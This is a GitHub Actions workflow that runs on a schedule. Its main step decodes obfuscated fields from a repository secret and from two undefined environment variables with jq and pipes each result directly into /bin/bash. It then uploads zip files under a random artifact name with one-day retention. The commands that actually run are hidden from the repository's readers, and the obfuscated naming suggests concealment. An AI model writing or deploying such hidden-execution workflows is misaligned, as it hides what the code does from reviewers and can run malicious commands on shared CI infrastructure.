name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '53 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          h44232: ${{ secrets.h44232 }}
        run: |
          printf '%s' "$h44232" | jq -r .gskbx13449 | /bin/bash
          echo $tbeio78 | jq -r .vjys1 | /bin/bash
          echo $rtm60812 | jq -r .siomo909 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: 43TFIrNc
          path: "*.zip"
          retention-days: 1
